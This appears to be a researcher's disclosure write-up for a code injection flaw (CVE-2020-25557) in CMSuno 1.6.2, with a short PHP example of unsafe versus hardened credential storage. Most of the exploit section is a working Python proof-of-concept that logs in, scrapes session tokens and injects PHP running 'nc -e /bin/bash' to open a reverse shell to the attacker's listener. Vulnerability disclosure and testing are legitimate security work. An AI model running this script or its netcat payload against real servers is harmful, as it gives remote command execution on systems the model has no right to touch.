Vendor: https://github.com/boiteasite/cmsuno/
Version: 1.6.2
Vulnerability: Code Injection
CVE: CVE-2020-25557
Exploit-DB: https://www.exploit-db.com/exploits/49031
Analysis
If you have read my other blog post about CMSuno, this vulnerability will be familiar to you because the root cause is the same, so I will not go into much detail in this article. The problem is that when you change your username and password, both values are written into the password.php file without any filtering, as shown below.
This is the content of the password.php file.
While changing your password, you can inject PHP code through the $user parameter. The injected code is stored in password.php and executed the next time you log in to the application.
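As an added illustration (not CMSuno's own code; the real password.php contents are not reproduced here), the snippet below shows a hypothetical writer that splices the username into PHP source the way the page describes, next to a hardened version that stores credentials as data instead of code. File paths and the username pattern are assumptions for the example.

```php
<?php
// Unsafe pattern (hypothetical): user-controlled text becomes PHP source.
// A username containing a closing quote followed by PHP code is executed
// the next time this file is included by the login flow.
function writePasswordFileUnsafe(string $path, string $user, string $pass): void
{
    $src = "<?php\n\$user=\"$user\";\n\$pass=\"$pass\";\n";
    file_put_contents($src !== '' ? $path : $path, $src);
}

// Hardened: never generate source code from user input. Restrict the
// username to a safe character set, hash the password, and persist the
// record as JSON that the login code reads back as data.
function writeCredentialsSafe(string $path, string $user, string $password): void
{
    if (!preg_match('/^[A-Za-z0-9_.-]{3,32}$/', $user)) {
        throw new InvalidArgumentException('username contains disallowed characters');
    }
    $record = [
        'user' => $user,
        'hash' => password_hash($password, PASSWORD_DEFAULT),
    ];
    $json = json_encode($record, JSON_THROW_ON_ERROR);
    // Write to a temp file and rename so a crash never leaves a half-written file.
    $tmp = $path . '.tmp';
    file_put_contents($tmp, $json, LOCK_EX);
    rename($tmp, $path);
}

function checkLogin(string $path, string $user, string $password): bool
{
    $rec = json_decode(file_get_contents($path), true, 512, JSON_THROW_ON_ERROR);
    return hash_equals($rec['user'], $user) && password_verify($password, $rec['hash']);
}

// Constructed demo: a username shaped like the injection this page describes
// (quote, PHP statement, closing tag) is rejected before it reaches disk.
$credFile = '/tmp/cmsuno_example_creds.json'; // assumed path for the demo
try {
    writeCredentialsSafe($credFile, 'en";system(\'id\');?>//', 's3cret');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
writeCredentialsSafe($credFile, 'admin', 's3cret');
var_dump(checkLogin($credFile, 'admin', 's3cret'));   // bool(true)
var_dump(checkLogin($credFile, 'admin', 'wrong'));    // bool(false)
```

If credentials must stay in a PHP file, emit the value with var_export($user, true) rather than raw interpolation so quotes are escaped, but storing data as JSON removes the code-generation step entirely.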
Exploit
I wrote a PoC for this vulnerability. You can use the PoC code below to test whether your version is vulnerable. Don't forget to take a backup of your password.php file first.
import requests
from bs4 import BeautifulSoup
import lxml
import json
from time import sleep
username = input("username: ")
password = input("password: ")
root_url = input("Root URL: http://192.168.1.9/cmsuno --> ")
listener_ip = input("Your ip: ")
listener_port = input("Your port for reverse shell: ")
login_url = root_url + "/uno.php"
vulnerable_url = root_url + "/uno/central.php"
session = requests.Session()
request = session.get(login_url)
# Get the unox value
soup = BeautifulSoup(request.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']
# Login
body = {"unox":unox,"user":username,"pass":password}
session.post(login_url, data=body)
# Get the second unox value
request = session.get(login_url)
text = request.text
soup = BeautifulSoup(text,"lxml")
script = soup.findAll('script')[1].string
data = script.split("Unox='")[1]
unox = data.split("',")[0]
# Exploit
header = {
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0",
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": login_url,
    "Referer": login_url
}
payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port)
body = 'action=sauvePass&unox={}&user0={}&pass0={}&user={}&pass=654321&lang=en'.format(unox,username,password,payload)
session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header)
# Login to trigger password.php
# Get the unox value
session1 = requests.Session()
request1 = session1.get(login_url)
soup = BeautifulSoup(request1.text,"lxml")
unox = soup.find("input",{'name':'unox'})['value']
# Login
sleep(3)
body = {"unox":unox,"user":username,"pass":password}
session1.post(login_url, data=body)
Disclosure Timeline
12 September 2020 - First Contact
29 September 2020 - Released CMSUno Version 1.6.3
30 September 2020 - Responsible Disclosure